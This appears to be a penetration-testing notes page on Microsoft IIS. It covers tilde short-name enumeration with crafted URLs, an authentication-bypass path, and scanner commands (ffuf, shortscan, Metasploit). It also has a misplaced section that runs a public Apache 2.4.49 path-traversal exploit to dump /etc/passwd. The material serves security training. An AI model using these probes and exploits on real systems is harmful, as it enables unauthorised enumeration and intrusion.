IIS

101

IIS (Internet Information Services) is a web server software made by Microsoft. It runs on Windows and is used to host websites, web applications, and services. It's commonly used for websites built with ASP.NET and other Microsoft technologies.

Directories

Webroot

C:\inetpub\wwwroot\

Config

%windir%\System32\inetsrv\config\applicationHost.config
C:\inetpub\wwwroot\web.config

Logs

C:\inetpub\logs\LogFiles\

Attacks

Tilde Flaw

The below information is based on Microsoft IIS tilde character “~” Vulnerability/Feature – Short File/Folder Name Disclosure paper.

Dirbusting

In older versions of Microsoft’s IIS, there's a way to discover hidden files and folders using something called 8.3 short file names. These are legacy DOS-style names (e.g., SECRET~1.HTM) automatically created for files like AcSecret.html. By using the tilde character (~) in a crafted URL, we can enumerate or guess these hidden names, even if the files are protected or not listed publicly.

When a server uses short file names, it maps a long filename like AcSecret.html to a short one like ACSECR~1.HTM. This behavior can be abused via URLs with wildcards (*, ?) and the tilde ~. For example:

http://victim.com/acsecr~1.htm/.aspx

If the server responds with a 404 (not found) instead of a 400 (bad request), it means the file exists — we've guessed part of a real filename! We can refine the guess:

Use a*~1*/.aspx to test if a file starts with a
Keep adjusting letters (ab*, ac*, etc.) until the server gives clues

For example, if there is a result such as http://10.10.10.10/file_co~1.txt:

# Extract the words starting with 'co'
$ grep '^co.*' /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt > start_with_co.txt

# Fuzz the file name
$ ffuf -w start_with_co.txt -u http://10.10.10.10/file_FUZZ.txt -ic -ac -c
...
connection    [Status: 200, Size: 142, Words: 3, Lines: 7, Duration: 35ms

The .aspx at the end of the URL is used due to a behavioral quirk of IIS that can be exploited to detect existing 8.3 names via different HTTP responses. IIS needs a valid extension at the end to route the request correctly. If the URL ends in something non-executable like .htm or no extension, IIS may return a generic response (like a 404 or 403) instead of a behavior we can differentiate.

Adding /.aspx (or /anything.aspx) can force IIS to treat the path as a route to an ASP.NET resource, and might produce different error codes depending on whether the target file/folder actually exists or not. Let’s say we try:

http://victim.com/secretfo~1/

If it doesn’t exist will respond with 404 Not Found, but if it exists might still give 404 or 403 depending on settings. On the other hand, if we try:

http://victim.com/secretfo~1/.aspx

If the folder exists, IIS may return a 403 (Forbidden) , where if it doesn’t exist, it may return a 404 (Not Found).

Bypassing Authentication

Even if a folder is protected with login prompts (like Basic or Windows auth), we can still enumerate files using a trick:

/ProtectedFolder::$Index_Allocation/*~1*/.aspx

This vector bypasses the login wall and lets us see what's inside as long as short names exist.

Alternate Data Streams

, the default file system used by modern versions of Windows, has a feature called ADS that can help us check if a file exists based on the HTTP responses:

/filename.html::$data/~1/.aspx

A 404 usually means the file is there, just not accessible directly.

Tools

The tilde enumeration can be automated using tools such as the shortscan:or MSF's iis_shortname_scanner module:

# Single target
$ shortscan http://example.org/

# File with a list of URLs
$ shortscan @urls.txt

# Initial scan
$ sudo msfconsole -q -x "use auxiliary/scanner/http/iis_shortname_scanner; set RHOSTS <target>; run;"

# Targeted scan
sudo msfconsole -q -x "use auxiliary/scanner/http/iis_shortname_scanner; set RHOSTS <target>; set path /dev/dca66d38fd916317687e1390a420c3fc; run;"

v2.4.49

# Search for public exploits
$ searchsploit Apache httpd 2.4.49
...
--------------------------------------------------------------------------
Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) | multiple/webapps/50383.sh
--------------------------------------------------------------------------

# Create a file with the target's socket
$ echo "192.168.X.245:8000" > web01_ip.txt

# Exploit the target
$ ./50383.sh web01_ip.txt /etc/passwd
http://192.168.X.245:8000
root:x:0:0:root:/root:/bin/bash
...
miranda:x:1001:1001:Miranda:/home/miranda:/bin/sh
steven:x:1002:1002:Steven:/home/steven:/bin/sh
mark:x:1003:1003:Mark:/home/mark:/bin/sh
anita:x:1004:1004:Anita:/home/anita:/bin/sh

PreviousApache NextNginx

Last updated 24 days ago

Was this helpful?